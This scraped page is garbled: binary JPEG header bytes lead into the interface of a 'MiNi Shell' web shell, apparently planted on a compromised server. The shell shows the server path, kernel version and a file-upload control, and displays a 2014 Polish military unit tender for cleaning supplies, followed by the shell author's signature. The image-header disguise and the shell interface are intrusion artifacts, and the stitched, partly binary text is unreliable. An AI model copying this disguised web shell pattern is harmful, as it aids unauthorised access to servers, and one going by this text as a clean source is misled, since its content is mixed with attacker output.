JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140513/102591-N-2014.html

<p class="kh_header"><b>Warszawa: Dostawa środków czystości i drobnego sprzętu, niezbędnych do zabezpieczenia potrzeb pododdziałów będących na zaopatrzeniu JW 4198</b><br>
<b>Numer ogłoszenia: 102591 - 2014; data zamieszczenia: 13.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa nr 4198 , ul. Żwirki i Wigury 1C, 00-909 Warszawa, woj. mazowieckie, tel. 022 6821316, faks 022 6821316.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.1bltr.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostko wojskowa 4198.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa środków czystości i drobnego sprzętu, niezbędnych do zabezpieczenia potrzeb pododdziałów będących na zaopatrzeniu JW 4198.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia
A.  Wykonawca jest zobowiązany dostarczyć wraz z dostawą wszelkie gwarancje producenta materiału/wyrobu, certyfikaty bezpieczeństwa, aprobaty techniczne, deklaracje lub certyfikaty zgodności. Wykonawca przekaże te dokumenty Zamawiającemu, najpóźniej z chwilą dostarczenia towaru do  magazynu Zamawiającego lub prześle je pocztą przed planowaną dostawą. Dokumenty te mają być oznakowane numerem odpowiadającym liczbie porządkowej materiału-wyrobu z arkusza ofertowego -opisu przedmiotu zamówienia-. Dokumenty muszą być sporządzone w języku polskim.  W przypadku braku tych dokumentów, Zamawiający ma prawo  odmówić przyjęcia partii dostawy, jako niezgodnej z opisem przedmiotu zamówienia.
B. W przypadku dostaw towaru za pośrednictwem firm spedycyjnych Zamawiający nie będzie kwitował odbioru towaru na dokumentach typu WZ przed dokładnym sprawdzeniem zawartości przesyłki.  
1.Wymagania obligatoryjne - standardy jakościowe
a) Produkt musi być ekologiczny i ulegać biodegradacji zgodnie z Rozporządzeniem Ministra Gospodarki  i Pracy szczegółowych dnia 23 lipca  2004 roku w sprawie  szczegółowych wymagań dla niektórych produktów ze względu na ich negatywne oddziaływanie na środowisko
b) Produkt musi posiadać - Kartę charakterystyki - zgodnie z Ustawą z dnia 11.01.2001r. o substancjach i  preparatach  chemicznych   -Dz.U.Nr 140z 2002r.- oraz  Rozporządzeniem  Ministra  Zdrowia  z  dnia 3 lipca 2002 r  -Dz. U. Nr 140, poz. 1171 w sprawie karty   charakterystyki substancji  niebezpiecznej  i preparatu niebezpiecznego, a wykonawca ma obowiązek dostarczyć przy pierwszej   dostawie  kartę charakterystyki preparatu chemicznego w 2 egzemplarzach, zawierającą następujące dane
 nazwę producenta oraz dane dotyczące jego identyfikacji,  skład i informacje o składnikach identyfikacja zagrożeń pierwsza pomoc, postępowanie w przypadku pożaru, postępowanie w przypadku uwolnienia do środowiska, postępowanie z preparatem i jego magazynowanie, informacja  o środkach ochrony indywidualnej, właściwości fizyko-chemiczne,  stabilność i reaktywność, informacje toksykologiczne,  informacje ekologiczne
postępowanie z odpadami
W przypadku  braku tych dokumentów, Zamawiający ma prawo  odmówić przyjęcia produktu jako niezgodnego z opisem przedmiotu zamówienia.               
2. Wymagania obligatoryjne - standardy logistyki dystrybucji:
a) produkty winny być pakowane i dystrybuowane w indywidualnych i zbiorczych opakowaniach;
b) opakowania indywidualne, winny być odporne na działanie środków w nich przechowywanych oraz na silne udary mechaniczne - min. upadek na twardą powierzchnię z wysokości 1 m-
c) opakowania jednostkowe winno posiadać zamknięcie, które gwarantuje pełną jego szczelność przed i po jego wielokrotnym otwarciu oraz plomby jednorazowe ulegające samozniszczeniu w trakcie pierwszego otwarcia;
d) opakowania jednostkowe powinny być znakowane standardowymi etykietami, informującymi użytkownika m.in. o warunkach magazynowania  i przechowywania, środkach bezpieczeństwa i zagrożeniach
e) opakowania jednostkowe o wadze powyżej pięciu  kilogramów, winny posiadać indywidualny, wygodny uchwyt do przenoszenia i przelewania produktu. Etykieta na opakowaniu jednostkowym powinna co najmniej zawierać -  nazwę, logo, adres producenta, opis przygotowania  produktu do użycia i sposób jego stosowania, opis składu chemicznego, czas skutecznego działania w przypadku środków dezynfekcyjnych,  sposób dozowania,  informacja ośrodkach ostrożności, w postaci znaków graficznych, ilość i pojemność opakowania indywidualnego i zbiorczego, numer serii i datę produkcji, okres przydatności do użycia
3. Warunki gwarancji  produkt powinien posiadać 12 - miesięczny termin przydatności do użycia od daty dostawy do magazynu Zamawiającego.
4.Zamawiany towar musi być dostarczany do zamawiającego w początkowym terminie jego przydatności do użycia  i odpowiadać normom przedmiotowy  i jakościowym.
5.Towar będzie zamawiany
a) sukcesywnie - 4 razy w ciągu trwania umowy, zgodnie ze złożonym zamówieniem od dnia podpisania umowy do dnia 24.10.2014 r. zgodnie z postanowieniami umowy.
b) zamówienie zostanie złożone pisemnie,  lub fax-em - na 7 dni przed dostawą   z określeniem daty dostawy. 
6. Wykonawca dowozi towar do magazynu  Zamawiającego na swój koszt od poniedziałku do piątku zgodnie z zamówieniem, w godz.: 8.00 - 14.00. 
7. Zamawiający  zastrzega , że ilość  przedmiotu umowy  określonego w Opisie, może ulec zmniejszeniu lub zwiększeniu w czasie obowiązywania  umowy, jednak wartość umowy nie przekroczy kwoty określonej  ofercie
W przypadku dostaw towaru za pośrednictwem firm spedycyjnych Zamawiający nie będzie kwitował odbioru towaru na dokumentach typu WZ przed dokładnym sprawdzeniem zawartości przesyłki.  
8. Wykonawca może wystawić fakturę VAT dopiero po dostarczeniu   całej  dostawy zgodnie z zamówieniem. Zamawiający nie dopuszcza faktur cząstkowych na daną dostawę.
9.Przy dostawie materiałów Wykonawca nie może zaoferować zamiennika, który nie został zaakceptowany -dopuszczony- przez Zamawiającego w trakcie trwania postępowania przetargowego.
Asortyment dostawy
1.Produkt do mycia  powierzchni -podłóg- - koncentrat w ilości 200 l
2.Produkt do mycia i konserwacji powierzchni ze stali nierdzewnej w ilości   30 l
3.Mydło do mycia rąk w płynie w ilości 1000 l
4.Produkt do mycia i dezynfekcji pomieszczeń sanitarnych w ilości 450 l
5.   Ręczniki papierowe w rolce - w ilości  200 szt. 
6.  Papier toaletowy miękki biały - w ilości 250 opakowań -16000 rolek-
7.  Ręczniki papierowe a-200szt. -  w ilości 300 op. zbiorczych - kartonów.
8.  Ściereczka 40cmx40cm z mikrofibry  frote  w ilości 500 szt.
9.  Rękawice ochronne -gospodarcze- w ilości 300 par.
10. Płyn do mycia szyb okiennych w ilości   200 szt.
11. Płyn do czyszczenia armatury łazienkowej -usuwający kamień i rdzę- w ilości
 600 szt.
12.Worki na odpady 240 l
Z grubej, czarnej, mocnej foli LDPE odpornej na rozrywanie. Opakowanie 10 szt.opak.	300
Asortyment środków czystości
13.Worki na odpady 120 l Z grubej, czarnej, mocnej foli LDPE odpornej na rozrywanie. Opakowanie 10 szt.
Rozmiar 70x110cm opak.500
14.Worki na odpady 160 lSzerokość 90 cm, Wysokość 110 cm, Ilość 10 sztuk na rolceopak.400
15.Worki na śmieci 60, Z grubej, czarnej, mocnej foli LDPE odpornej na rozrywanie o wymiarach 60 x 67 cm
Ilość: 20 sztuk na rolceopak.1000
16.Zmiotka i szufelką -gumowe wykończenie szufelki z tworzywa sztucznego-kpl.80
17.Końcówka MOP 30cm
Materiał sznurek bawełnianyszt. 50
18.Kpl MOP -wiadro, wyciskacz, kij, końcówka MOP 30cm
Wiadro plastikowe o poj. 10 - 12 litrów, okrągłe lub prostokątne z wyciskaczem i zapasem mop. 
Grubość ścianki wiadra min. 2 mm. szt. 25
19.Szczotka do zamiatania + kij
Szczotka do zamiata podłóg wykonana z miękkiego  włosia o długości 6 - 8 cm. Włosie obsadzone w min. 4 rzędach w oprawie drewnianej o długości 40-50 cm obsadzona na drewnianym kiju o długości 120 cm szt.120
20.Wkład  do MOP  płaskiego z mikrowłókna -z zaczepami- typu -Ultramax-szt.100
21.Wiadro gosp. o poj.12 l plastikowe z uchwytem plastikowym, kolor szary,, niebieski , stożkowy  kształt 	szt.	100
22.Kosz na śmiecie  poj. 12-15 l pcv uchylny kolor szary, popielaty po około 50% na kolor 	szt.100
23.Kosze na odpady z pokrywą -25l- plastikowyszt. 20
24.Ściereczka do kurzu w opakowaniu 10 szt.  
Wymiary 15 x 15 cm Właściwości antystatyczne. opak. 300
25.Ścierka do podłogi z mikrofibry o wym.50x60 cm
Ściereczka do użycia na sucho i mokro, dobrze zbierająca kurz oraz wchłaniająca wodę i brud.szt500
26. Wkład odświeżacza  powietrza Freshmatic Max  do  urządzenia AIR WICK  150 szt.
27. Uniwersalny płyn do podłóg, mydło marsylskie  0,75 l         500 szt.
28. Kostka do WC  z koszykiem 40 g.      2200 szt.
29. Odświeżacz powietrza  w sprayu      300 ml     500 szt.
30. Pianka do mebli , drewna w sprayu     250 ml    szt. 250
31. Proszek do prania wykładzin i tapicerki  Karcher RM 760   szt.  5
32. Sól tabletkowana do stacji uzdatniania wody  opak.25 kg.        szt. 40
33. Pasta samopołyskowa  do nabłyszczania pvc, paneli opak.5 l   szt. 60
34. Papier  typu Jumbo bialyszt. 120
35. Mleczko-cream  do czyszczenia wszelkich powierzchni   z uporczywym brudem 250 ml  szt. 600
36. Żel  na  kamień, rdze  opak. 500 g.  szt. 500
Szczegółowy Opis przedmiotu zamówienia i SIWZ, znajduje się na stronie internetowej Zamawiającego, www.1bltr.wp.mil.pl.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 39.83.10.00-6, 39.81.30.00-4, 39.93.30.00-0, 39.81.11.00-1, 39.80.00.00-0, 39.83.13.00-9, 39.83.16.00-2, 33.71.19.00-6, 39.22.42.00-0, 39.22.43.10-4, 39.81.24.00-1, 39.52.58.00-6, 39.52.58.10-9, 39.52.51.00-9, 39.22.43.30-0, 39.22.43.40-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">nie dotyczy</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2013r, poz. 907 z późn. zm.) - załącznik nr 4 do SIWZ.
2. Oświadczenie o braku podstaw do wykluczenia - załącznik nr 5 do SIWZ.
3. Oświadczenie Wykonawcy o przynależności do grupy kapitałowej (art. 24 ust. 2 pkt 5 ustawy Prawo zamówień publicznych) - załącznik    nr 6  do SIWZ.
4.	Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt.2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art.24. ust.1 pkt.2 ustawy.
5. Pełnomocnictwo do podpisania oferty, jeśli to nie wynika z innych dokumentów dołączonych do oferty</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.1bltr.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4198,   00-909 Warszawa ul. Żwirki i Wigury 1C, 
budynek 50, pok. 4.</p><p><b>IV.4.2) Opis potrzeb i wymagań zamawiającego określonych w sposób umożliwiający przygotowanie się wykonawców do udziału w dialogu konkurencyjnym lub informacja o sposobie uzyskania tego opisu:</b> nie dotyczy.</p><p><b>IV.4.3) Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:</b> nie dotyczy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2014 godzina 10:00, miejsce: Jednostka Wojskowa 4198,   00-909 Warszawa ul. Żwirki i Wigury 1C, 
budynek 51,  Kancelaria..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com